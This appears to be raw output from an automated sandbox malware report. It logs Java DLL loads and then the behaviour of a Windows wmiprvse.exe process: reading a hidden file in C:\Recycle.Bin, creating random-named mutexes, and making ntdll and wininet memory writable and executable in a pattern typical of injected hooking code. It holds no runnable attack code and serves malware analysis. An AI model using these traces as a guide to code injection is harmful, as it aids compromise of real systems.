Section loaded Path: \KnownDlls\SETUPAPI.DLL Access: write and read and execute Type: unknown Baseaddress: 6D7A0000 Size: 49152 Protection: read write Mapped to pid: own pid object name not found 2254767358
Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 2254767973
Section loaded Path: \KnownDlls\SETUPAPI.DLL Access: write and read and execute Type: unknown Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid object name not found 2255070187
Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 2255070828
Section loaded Path: C:\Program Files\Java\jre6\bin\zip.dll Access: write and read and execute Type: commit Baseaddress: 10B0000 Size: 49152 Protection: execute Mapped to pid: own pid success or wait 2255097619
Section loaded Path: C:\Program Files\Java\jre6\bin\zip.dll Access: query and write and read and execute Type: image Baseaddress: 6D7E0000 Size: 61440 Protection: read write Mapped to pid: own pid success or wait 2255098416
Section loaded Path: \KnownDlls\SETUPAPI.DLL Access: write and read and execute Type: unknown Baseaddress: 6D7E0000 Size: 61440 Protection: read write Mapped to pid: own pid object name not found 2255104552
Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 2255105170
Section loaded Path: \KnownDlls\SETUPAPI.DLL Access: write and read and execute Type: unknown Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid object name not found 2255132027
Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 2255132634
Thread created PID: 508 TID: 3228 EIP: 7C8106F9 Imagepath: C:\Program Files\Java\jre6\bin\jqs.exe Injected: false success or wait 2317647019
Thread created PID: 508 TID: 3320 EIP: 7C8106F9 Imagepath: C:\Program Files\Java\jre6\bin\jqs.exe Injected: false success or wait 2318766108
File opened Path: \pipe\globpluginspipe Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false object name not found 2318768230
Section loaded Path: C:\Program Files\Java\jre6\bin\client\classes.jsa Access: query and read Type: commit Baseaddress: 10B0000 Size: 13369344 Protection: readonly Mapped to pid: own pid success or wait 2369673500
Section loaded Path: \KnownDlls\SETUPAPI.DLL Access: write and read and execute Type: unknown Baseaddress: 10B0000 Size: 13369344 Protection: readonly Mapped to pid: own pid object name not found 2369674456
Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 2369676129
Section loaded Path: \KnownDlls\SETUPAPI.DLL Access: write and read and execute Type: unknown Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid object name not found 2369909432
Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 2369911212
Section loaded Path: C:\Program Files\Java\jre6\bin\awt.dll Access: write and read and execute Type: commit Baseaddress: 10B0000 Size: 1208320 Protection: execute Mapped to pid: own pid success or wait 2386434046
Section loaded Path: C:\Program Files\Java\jre6\bin\awt.dll Access: query and write and read and execute Type: image Baseaddress: 6D000000 Size: 1351680 Protection: read write Mapped to pid: own pid success or wait 2386434867
Section loaded Path: \KnownDlls\SETUPAPI.DLL Access: write and read and execute Type: unknown Baseaddress: 6D000000 Size: 1351680 Protection: read write Mapped to pid: own pid object name not found 2386441453
Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 2386442074
Section loaded Path: \KnownDlls\SETUPAPI.DLL Access: write and read and execute Type: unknown Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid object name not found 2386475004
Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 2386475622
Section loaded Path: C:\Program Files\Java\jre6\bin\client\jvm.dll Access: write and read and execute Type: commit Baseaddress: 10B0000 Size: 2695168 Protection: execute Mapped to pid: own pid success or wait 2386503152
Section loaded Path: C:\Program Files\Java\jre6\bin\client\jvm.dll Access: query and write and read and execute Type: image Baseaddress: 6D7F0000 Size: 2777088 Protection: read write Mapped to pid: own pid success or wait 2386503995
Section loaded Path: \KnownDlls\SETUPAPI.DLL Access: write and read and execute Type: unknown Baseaddress: 6D7F0000 Size: 2777088 Protection: read write Mapped to pid: own pid object name not found 2386510483
Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 2386511089
Section loaded Path: \KnownDlls\SETUPAPI.DLL Access: write and read and execute Type: unknown Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid object name not found 2386547674
Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 2386548296
Section loaded Path: C:\Program Files\Java\jre6\bin\dcpr.dll Access: write and read and execute Type: commit Baseaddress: 10B0000 Size: 143360 Protection: execute Mapped to pid: own pid success or wait 2386575786
Section loaded Path: C:\Program Files\Java\jre6\bin\dcpr.dll Access: query and write and read and execute Type: image Baseaddress: 6D1A0000 Size: 143360 Protection: read write Mapped to pid: own pid success or wait 2386576578
Section loaded Path: \KnownDlls\SETUPAPI.DLL Access: write and read and execute Type: unknown Baseaddress: 6D1A0000 Size: 143360 Protection: read write Mapped to pid: own pid object name not found 2386583091
Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 2386583709
Section loaded Path: \KnownDlls\SETUPAPI.DLL Access: write and read and execute Type: unknown Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid object name not found 2386863458
Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 2386864070
Section loaded Path: C:\Program Files\Java\jre6\bin\deploy.dll Access: write and read and execute Type: commit Baseaddress: 10B0000 Size: 77824 Protection: execute Mapped to pid: own pid success or wait 2386892563
Section loaded Path: C:\Program Files\Java\jre6\bin\deploy.dll Access: query and write and read and execute Type: image Baseaddress: 6D1D0000 Size: 77824 Protection: read write Mapped to pid: own pid success or wait 2386893389
Section loaded Path: \KnownDlls\SETUPAPI.DLL Access: write and read and execute Type: unknown Baseaddress: 6D1D0000 Size: 77824 Protection: read write Mapped to pid: own pid object name not found 2386899413
Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 2386900023
Section loaded Path: \KnownDlls\SETUPAPI.DLL Access: write and read and execute Type: unknown Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid object name not found 2386927430
Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 2386928071
Section loaded Path: C:\Program Files\Java\jre6\bin\fontmanager.dll Access: write and read and execute Type: commit Baseaddress: 10B0000 Size: 323584 Protection: execute Mapped to pid: own pid success or wait 2386955502
Section loaded Path: C:\Program Files\Java\jre6\bin\fontmanager.dll Access: query and write and read and execute Type: image Baseaddress: 6D230000 Size: 323584 Protection: read write Mapped to pid: own pid success or wait 2386956337
Section loaded Path: \KnownDlls\SETUPAPI.DLL Access: write and read and execute Type: unknown Baseaddress: 6D230000 Size: 323584 Protection: read write Mapped to pid: own pid object name not found 2386962414
Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 2386963022
Section loaded Path: \KnownDlls\SETUPAPI.DLL Access: write and read and execute Type: unknown Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid object name not found 2386991079
Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 2386991686
Section loaded Path: C:\Program Files\Java\jre6\bin\hpi.dll Access: write and read and execute Type: commit Baseaddress: 10B0000 Size: 16384 Protection: execute Mapped to pid: own pid success or wait 2387018826
Section loaded Path: C:\Program Files\Java\jre6\bin\hpi.dll Access: query and write and read and execute Type: image Baseaddress: 6D280000 Size: 32768 Protection: read write Mapped to pid: own pid success or wait 2387019618
Section loaded Path: \KnownDlls\SETUPAPI.DLL Access: write and read and execute Type: unknown Baseaddress: 6D280000 Size: 32768 Protection: read write Mapped to pid: own pid object name not found 2387025651
Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 2387026592
Section loaded Path: \KnownDlls\SETUPAPI.DLL Access: write and read and execute Type: unknown Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid object name not found 2387053141
Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 2387059743
Section loaded Path: C:\Program Files\Java\jre6\bin\java.dll Access: write and read and execute Type: commit Baseaddress: 10B0000 Size: 126976 Protection: execute Mapped to pid: own pid success or wait 2387086904
Section loaded Path: C:\Program Files\Java\jre6\bin\java.dll Access: query and write and read and execute Type: image Baseaddress: 6D320000 Size: 126976 Protection: read write Mapped to pid: own pid success or wait 2387087696
Section loaded Path: \KnownDlls\SETUPAPI.DLL Access: write and read and execute Type: unknown Baseaddress: 6D320000 Size: 126976 Protection: read write Mapped to pid: own pid object name not found 2387093667
Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 2387094281
Section loaded Path: \KnownDlls\SETUPAPI.DLL Access: write and read and execute Type: unknown Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid object name not found 2387423645
Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 2387424251
Section loaded Path: C:\Program Files\Java\jre6\bin\javaw.exe Access: write and read and execute Type: commit Baseaddress: 10B0000 Size: 147456 Protection: execute Mapped to pid: own pid success or wait 2387452884
Section loaded Path: C:\Program Files\Java\jre6\bin\javaw.exe Access: query and write and read and execute Type: image Baseaddress: 10B0000 Size: 147456 Protection: read write Mapped to pid: own pid conflicting addresses 2387453682
Section loaded Path: \KnownDlls\SETUPAPI.DLL Access: write and read and execute Type: unknown Baseaddress: 10B0000 Size: 147456 Protection: read write Mapped to pid: own pid object name not found 2387459940
Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 2387460532
Section loaded Path: \KnownDlls\SETUPAPI.DLL Access: write and read and execute Type: unknown Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid object name not found 2387486570
Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 2387487168
Section loaded Path: C:\Program Files\Java\jre6\bin\jp2native.dll Access: write and read and execute Type: commit Baseaddress: 10B0000 Size: 8192 Protection: execute Mapped to pid: own pid success or wait 2387519171
Section loaded Path: C:\Program Files\Java\jre6\bin\jp2native.dll Access: query and write and read and execute Type: image Baseaddress: 6D420000 Size: 24576 Protection: read write Mapped to pid: own pid success or wait 2387519969
Section loaded Path: \KnownDlls\SETUPAPI.DLL Access: write and read and execute Type: unknown Baseaddress: 6D420000 Size: 24576 Protection: read write Mapped to pid: own pid object name not found 2387525700
Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 2387526309
Section loaded Path: \KnownDlls\SETUPAPI.DLL Access: write and read and execute Type: unknown Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid object name not found 2387552423
Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 2387553000
Section loaded Path: C:\Program Files\Java\jre6\bin\jpeg.dll Access: write and read and execute Type: commit Baseaddress: 10B0000 Size: 151552 Protection: execute Mapped to pid: own pid success or wait 2387579097
Section loaded Path: C:\Program Files\Java\jre6\bin\jpeg.dll Access: query and write and read and execute Type: image Baseaddress: 6D440000 Size: 151552 Protection: read write Mapped to pid: own pid success or wait 2387579857
Section loaded Path: \KnownDlls\SETUPAPI.DLL Access: write and read and execute Type: unknown Baseaddress: 6D440000 Size: 151552 Protection: read write Mapped to pid: own pid object name not found 2387586091
Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 2387586678
Section loaded Path: \KnownDlls\SETUPAPI.DLL Access: write and read and execute Type: unknown Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid object name not found 2389705962
Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 2389706556
Section loaded Path: \KnownDlls\SETUPAPI.DLL Access: write and read and execute Type: unknown Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid object name not found 2389734692
Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 2389735265
Section loaded Path: \KnownDlls\SETUPAPI.DLL Access: write and read and execute Type: unknown Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid object name not found 2389762636
Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 2389763251
Section loaded Path: C:\Program Files\Java\jre6\bin\net.dll Access: write and read and execute Type: commit Baseaddress: 10B0000 Size: 77824 Protection: execute Mapped to pid: own pid success or wait 2389789865
Section loaded Path: C:\Program Files\Java\jre6\bin\net.dll Access: query and write and read and execute Type: image Baseaddress: 6D600000 Size: 77824 Protection: read write Mapped to pid: own pid success or wait 2389790625
Section loaded Path: \KnownDlls\SETUPAPI.DLL Access: write and read and execute Type: unknown Baseaddress: 6D600000 Size: 77824 Protection: read write Mapped to pid: own pid object name not found 2389796590
Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 2389797177
Section loaded Path: \KnownDlls\SETUPAPI.DLL Access: write and read and execute Type: unknown Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid object name not found 2389823968
Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 2389824552
Section loaded Path: C:\Program Files\Java\jre6\bin\nio.dll Access: write and read and execute Type: commit Baseaddress: 10B0000 Size: 20480 Protection: execute Mapped to pid: own pid success or wait 2389851099
Section loaded Path: C:\Program Files\Java\jre6\bin\nio.dll Access: query and write and read and execute Type: image Baseaddress: 6D620000 Size: 36864 Protection: read write Mapped to pid: own pid success or wait 2389851890
Section loaded Path: \KnownDlls\SETUPAPI.DLL Access: write and read and execute Type: unknown Baseaddress: 6D620000 Size: 36864 Protection: read write Mapped to pid: own pid object name not found 2389858006
Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 2389858591
Section loaded Path: \KnownDlls\SETUPAPI.DLL Access: write and read and execute Type: unknown Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid object name not found 2390204425
Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 2390205107
Section loaded Path: C:\Program Files\Java\jre6\bin\regutils.dll Access: write and read and execute Type: commit Baseaddress: 10B0000 Size: 278528 Protection: execute Mapped to pid: own pid success or wait 2390232927
Section loaded Path: C:\Program Files\Java\jre6\bin\regutils.dll Access: query and write and read and execute Type: image Baseaddress: 6D6A0000 Size: 286720 Protection: read write Mapped to pid: own pid success or wait 2390233729
Section loaded Path: \KnownDlls\SETUPAPI.DLL Access: write and read and execute Type: unknown Baseaddress: 6D6A0000 Size: 286720 Protection: read write Mapped to pid: own pid object name not found 2390239486
Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 2390240077
Section loaded Path: \KnownDlls\SETUPAPI.DLL Access: write and read and execute Type: unknown Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid object name not found 2390268277
Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 2390268872
Section loaded Path: C:\Program Files\Java\jre6\bin\verify.dll Access: write and read and execute Type: commit Baseaddress: 10B0000 Size: 32768 Protection: execute Mapped to pid: own pid success or wait 2390294711
Section loaded Path: C:\Program Files\Java\jre6\bin\verify.dll Access: query and write and read and execute Type: image Baseaddress: 6D7A0000 Size: 49152 Protection: read write Mapped to pid: own pid success or wait 2390295506
Section loaded Path: \KnownDlls\SETUPAPI.DLL Access: write and read and execute Type: unknown Baseaddress: 6D7A0000 Size: 49152 Protection: read write Mapped to pid: own pid object name not found 2390301450
Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 2390302038
Section loaded Path: \KnownDlls\SETUPAPI.DLL Access: write and read and execute Type: unknown Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid object name not found 2390328477
Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 2390329052
Section loaded Path: C:\Program Files\Java\jre6\bin\zip.dll Access: write and read and execute Type: commit Baseaddress: 10B0000 Size: 49152 Protection: execute Mapped to pid: own pid success or wait 2390355507
Section loaded Path: C:\Program Files\Java\jre6\bin\zip.dll Access: query and write and read and execute Type: image Baseaddress: 6D7E0000 Size: 61440 Protection: read write Mapped to pid: own pid success or wait 2390356277
Section loaded Path: \KnownDlls\SETUPAPI.DLL Access: write and read and execute Type: unknown Baseaddress: 6D7E0000 Size: 61440 Protection: read write Mapped to pid: own pid object name not found 2390362069
Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 2390362654
Section loaded Path: \KnownDlls\SETUPAPI.DLL Access: write and read and execute Type: unknown Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid object name not found 2390388446
Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 2390389072
Sections
+ General
Start time: 05:48:13
Start date: 01/12/2011
Path: C:\WINDOWS\system32\alg.exe
Commandline: C:\WINDOWS\System32\alg.exe
Imagebase: 0x1000000
File size: 44544 bytes
MD5 hash: 8C515081584A38AA007909CD02020B3D
Chronological sections
Operation Data Completion Time
Sections
+ General
Start time: 05:48:13
Start date: 01/12/2011
Path: C:\WINDOWS\system32\wscntfy.exe
Commandline: C:\WINDOWS\system32\wscntfy.exe
Imagebase: 0x1000000
File size: 13824 bytes
MD5 hash: F92E1076C42FCD6DB3D72D8CFE9816D5
Chronological sections
Operation Data Completion Time
Sections
+ General
Start time: 05:48:13
Start date: 01/12/2011
Path: C:\WINDOWS\system32\msiexec.exe
Commandline: C:\WINDOWS\system32\msiexec.exe /V
Imagebase: 0x1000000
File size: 78848 bytes
MD5 hash: 5879D691E842574A20FE63817CB76DF9
Chronological sections
Operation Data Completion Time
+ Sections
+ General
Start time: 05:48:14
Start date: 01/12/2011
Path: C:\WINDOWS\system32\wbem\wmiprvse.exe
Commandline: C:\WINDOWS\system32\wbem\wmiprvse.exe -Embedding
Imagebase: 0x1000000
File size: 227840 bytes
MD5 hash: 798A9E6828997EEF4517ADA8A2259831
File Activities:
+ File opened
File Path Access Options Content overwritten Completion Count Source Address
C:\WINDOWS\system32\ntdll.dll read attributes and synchronize and generic read synchronous io non alert and non directory file and random access false success or wait 5 BAD6A36
C:\Recycle.Bin\07A49F015E0D693 read attributes and synchronize and generic read synchronous io non alert and non directory file false success or wait 2 BAF4E4E
C:\WINDOWS\system32\USER32.dll read attributes and synchronize and generic read synchronous io non alert and non directory file and random access false success or wait 1 BAD6A36
C:\WINDOWS\system32\WININET.dll read attributes and synchronize and generic read synchronous io non alert and non directory file and random access false success or wait 11 BAD6A36
C:\WINDOWS\system32\WS2_32.dll read attributes and synchronize and generic read synchronous io non alert and non directory file and random access false success or wait 1 BAD6A36
C:\WINDOWS\system32\ADVAPI32.dll read attributes and synchronize and generic read synchronous io non alert and non directory file and random access false success or wait 1 BAD6A36
C:\WINDOWS\system32\CRYPT32.dll read attributes and synchronize and generic read synchronous io non alert and non directory file and random access false success or wait 1 BAD6A36
\pipe\globpluginspipe read attributes and synchronize and generic read synchronous io non alert and non directory file false object name not found 1 BADD812
+ File read
File Path Offset Length Value Completion Count Source Address
C:\Recycle.Bin\07A49F015E0D693 none 5934 50 D7 96 D6 A6 EA BF F3 B7 FB 7B 65 8A 85 C9 85 C9 85 C9 85 C9 85 D8 95 D9 95 D3 9F FC B0 5F 82 BC 6E 9B 4E 30 D8 75 A5 B6 46 1F 53 16 3C E9 D5 6F 23 7C CC 40 C7 5F 13 5B 25 68 B6 F4 00 4A FB D0 8B 29 AA 5C 07 EB F8 69 F9 3F A6 F2 9C 1F 0D EA 9E F6 D2 0B 00 8E C4 6C EF 48 BA B7 4B DA AD F9 82 10 28 success or wait 2 BAE818F
Section Activities:
Section loaded by Windows
File Path Access Type Base Size Mapped to pid Protection Completion Count
+ Section loaded by program
File Path Access Type Base Size Mapped to pid Protection Completion Count Source Address
\KnownDlls\CRYPT32.dll write and read and execute unknown 77920000 995328 own pid read write object name not found 1 BAE50FD
C:\WINDOWS\system32\crypt32.dll query and write and read and execute image 77A80000 610304 own pid read write success or wait 1 BAE50FD
\KnownDlls\MSASN1.dll write and read and execute unknown 77A80000 610304 own pid read write object name not found 1 BAE50FD
C:\WINDOWS\system32\msasn1.dll query and write and read and execute image 77B20000 73728 own pid read write success or wait 1 BAE50FD
\KnownDlls\WININET.dll write and read and execute unknown 3D930000 942080 own pid read write success or wait 1 BAE50FD
\KnownDlls\Normaliz.dll write and read and execute unknown C10000 36864 own pid read write conflicting addresses 1 BAE50FD
\KnownDlls\urlmon.dll write and read and execute unknown 78130000 1257472 own pid read write success or wait 1 BAE50FD
\KnownDlls\iertutil.dll write and read and execute unknown 3DFD0000 2002944 own pid read write success or wait 1 BAE50FD
\KnownDlls\MSIMG32.dll write and read and execute unknown 3DFD0000 2002944 own pid read write object name not found 1 BAE50FD
C:\WINDOWS\system32\msimg32.dll query and write and read and execute image 76380000 20480 own pid read write success or wait 1 BAE50FD
C:\WINDOWS\system32\ntdll.dll query and read commit E80000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\ntdll.dll query and read commit E80000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\ntdll.dll query and read commit E80000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\ntdll.dll query and read commit E80000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\ntdll.dll query and read commit E80000 65536 own pid readonly success or wait 1 BAD6A8A
\KnownDlls\nspr4.dll write and read and execute unknown E80000 65536 own pid readonly object name not found 1 BAF1523
C:\WINDOWS\system32\user32.dll query and read commit E80000 57344 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit E80000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit E80000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit E80000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit E80000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit E80000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit E80000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit E80000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit E80000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit E80000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit E80000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit E80000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\ws2_32.dll query and read commit E80000 20480 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\advapi32.dll query and read commit E80000 28672 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\crypt32.dll query and read commit E80000 77824 own pid readonly success or wait 1 BAD6A8A
Mutant Activities:
+ Mutant created
Name Completion Count Source Address
\BaseNamedObjects\zXeRY3a_PtW|00000000 success or wait 1 C006B4
\BaseNamedObjects\Global\25LSmN0q5Cx8k1GCFvMKe5z0i3US0DM object name exists 1 BAE0EF7
Thread Activities:
+ Thread created
TID PID EIP Injected Filepath Completion Count Source Address
2780 1120 7C8106F9 false C:\WINDOWS\system32\wbem\wmiprvse.exe success or wait 1 C00639
1968 1120 7C8106F9 false C:\WINDOWS\system32\wbem\wmiprvse.exe success or wait 1 BAD6140
1400 1120 7C8106F9 false C:\WINDOWS\system32\wbem\wmiprvse.exe success or wait 1 BAD6140
1928 1120 7C8106F9 false C:\WINDOWS\system32\wbem\wmiprvse.exe success or wait 1 BAD6140
2824 1120 7C8106F9 false C:\WINDOWS\system32\wbem\wmiprvse.exe success or wait 1 BAD6140
+ Thread delayed
TID Delay Completion Count Source Address
6504 0s success or wait 276 BAED21A
6504 0s user apc 3 BAED21A
+ Thread terminated
TID PID Completion Count Source Address
2780 1120 success or wait 0 C00279
Memory Activities:
+ Memory attributes changed
PID Filepath Base Length New Protection Old Protection Completion Count Source Address
1120 C:\WINDOWS\system32\wbem\wmiprvse.exe 7C90CFEE 2000 page execute and read and write page execute and read and write success or wait 1 C005EC
1120 C:\WINDOWS\system32\wbem\wmiprvse.exe 7C90D76E 2000 page execute and read and write page execute and write copy success or wait 1 BAE95DC
1120 C:\WINDOWS\system32\wbem\wmiprvse.exe 7C90D76E 2000 page execute and read and write page execute and read and write success or wait 1 BAF2C8B
1120 C:\WINDOWS\system32\wbem\wmiprvse.exe BAF6E20 2000 page execute and read and write page execute and read and write success or wait 1 BAF2C8B
1120 C:\WINDOWS\system32\wbem\wmiprvse.exe 7C90DF1E 2000 page execute and read and write page execute and read and write success or wait 2 BAE95DC
1120 C:\WINDOWS\system32\wbem\wmiprvse.exe BB10A90 2000 page execute and read and write page execute and read and write success or wait 1 BAF2CA1
1120 C:\WINDOWS\system32\wbem\wmiprvse.exe 7C90DC5E 2000 page execute and read and write page execute and read and write success or wait 2 BAE95DC
1120 C:\WINDOWS\system32\wbem\wmiprvse.exe BAFF2F8 2000 page execute and read and write page execute and read and write success or wait 1 BAF2CB7
1120 C:\WINDOWS\system32\wbem\wmiprvse.exe 7C90D2EE 2000 page execute and read and write page execute and read and write success or wait 2 BAE95DC
1120 C:\WINDOWS\system32\wbem\wmiprvse.exe BAFCF58 2000 page execute and read and write page execute and read and write success or wait 1 BAF2CCD
1120 C:\WINDOWS\system32\wbem\wmiprvse.exe 7C90DB3E 2000 page execute and read and write page execute and read and write success or wait 2 BAE95DC
1120 C:\WINDOWS\system32\wbem\wmiprvse.exe BB10168 2000 page execute and read and write page execute and read and write success or wait 1 BAF2D09
1120 C:\WINDOWS\system32\wbem\wmiprvse.exe 7E418BF6 2000 page execute and read and write page execute read success or wait 1 BAE95DC
1120 C:\WINDOWS\system32\wbem\wmiprvse.exe 7E418BF6 2000 page execute and read and write page execute and read and write success or wait 1 BAED314
1120 C:\WINDOWS\system32\wbem\wmiprvse.exe BAFC210 2000 page execute and read and write page execute and read and write success or wait 1 BAED314
1120 C:\WINDOWS\system32\wbem\wmiprvse.exe 3D949088 2000 page execute and read and write page execute read success or wait 1 BAE95DC
1120 C:\WINDOWS\system32\wbem\wmiprvse.exe 3D949088 2000 page execute and read and write page execute and read and write success or wait 1 BAF138F
